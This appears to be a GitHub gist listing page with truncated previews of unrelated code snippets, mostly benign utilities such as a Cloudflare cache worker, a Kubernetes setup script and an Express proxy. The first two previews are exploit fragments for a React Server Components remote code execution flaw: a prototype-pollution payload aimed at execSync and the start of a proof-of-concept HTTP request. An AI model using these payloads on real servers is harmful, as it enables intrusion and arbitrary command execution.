QuadTriangle
akshaymarch7
/ exploit0.js
Created
December 16, 2025 04:59
React Critical Vulnerability (CVSS 10.0) - exploit0 code
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (async () => { | |
| // === CONFIGURATION === | |
| const targetUrl = "/namaste"; // The endpoint to hit (relative to current domain) | |
| console.log(`[*] Attempting to run command: ${cmd}`); | |
| // 1. Construct the malicious payload | |
| // This injects the command into a child_process.execSync call and throws the result in an error digest | |
| const payloadJson = `{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\\"then\\":\\"$B1337\\"}","_response":{"_prefix":"console.log('meowmeow')//","_formData":{"get":"$1:constructor:constructor"}}}`; | |
maple3142
/ CVE-2025-55182.http
Last active
May 2, 2026 18:25
CVE-2025-55182 React Server Components RCE POC
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| POST / HTTP/1.1 | |
| Host: localhost | |
| User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36 | |
| Next-Action: x | |
| Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad | |
| Content-Length: 459 | |
| ------WebKitFormBoundaryx8jO2oVc6SWP3Sad | |
| Content-Disposition: form-data; name="0" |
richardscarrott
/ worker.ts
Last active
February 8, 2026 09:50
Cloudflare Workers / Pages `stale-while-revalidate`
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import { parse } from 'cache-control-parser'; | |
| export default { | |
| async fetch(request: Request, env: {}, ctx: ExecutionContext): Promise<Response> { | |
| try { | |
| const cache = await caches.default; | |
| const cachedResponse = await cache.match(request); | |
| if (cachedResponse) { | |
| console.log('Cache: HIT'); | |
| if (shouldRevalidate(cachedResponse)) { |
roblabla
/ organizer2.py
Last active
December 1, 2020 09:40
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| VERBOSE = False | |
| import os | |
| import subprocess | |
| import shutil | |
| import errno | |
| import hashlib |
i11
/ full_kube_setup_on_trusty.sh
Last active
December 29, 2021 08:14
Setup kubernetes on Ubuntu 14.04 (trusty)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash -e | |
| # | |
| # Depends on https://gist.github.com/i11/433fcbcbfcedb677a26673426d304fc1#file-trusty-kubernetes-sh | |
| # Assuming logged in as normal user | |
| sudo -i | |
| # Update | |
| apt-get update | |
| apt-get upgrade -y |
theychx
/ ytdl_totalsize.py
Last active
October 2, 2023 08:31
Script that uses youtube-dl to calculate total size of all videos in a playlist (also works with single videos). Now at this repo: https://github.com/theychx/totalsize
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #! /usr/bin/env python3 | |
| import math | |
| import sys | |
| import youtube_dl | |
| BEST_FORMAT = "bestvideo+bestaudio/best" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import sys | |
| def j(lineno): | |
| frame = sys._getframe().f_back | |
| called_from = frame | |
| def hook(frame, event, arg): | |
| if event == 'line' and frame == called_from: | |
| try: | |
| frame.f_lineno = lineno |
ZachSaucier
/ dark-theme.css
Last active
December 4, 2025 11:02
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| @import 'https://fonts.googleapis.com/css?family=Open+Sans'; | |
| * { | |
| -webkit-box-sizing: border-box; | |
| box-sizing: border-box; | |
| } | |
| body { | |
| font-family: 'Open Sans', sans-serif; | |
| line-height: 1.75em; |
davemo
/ api.proxy.server.js
Created
November 6, 2012 21:56
A simple express.js server with a proxy that intercepts all requests with /api/ and proxies them to localhost:3000
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var express = require('express'), | |
| httpProxy = require('http-proxy'), | |
| app = express(); | |
| var proxy = new httpProxy.RoutingProxy(); | |
| function apiProxy(host, port) { | |
| return function(req, res, next) { | |
| if(req.url.match(new RegExp('^\/api\/'))) { | |
| proxy.proxyRequest(req, res, {host: host, port: port}); |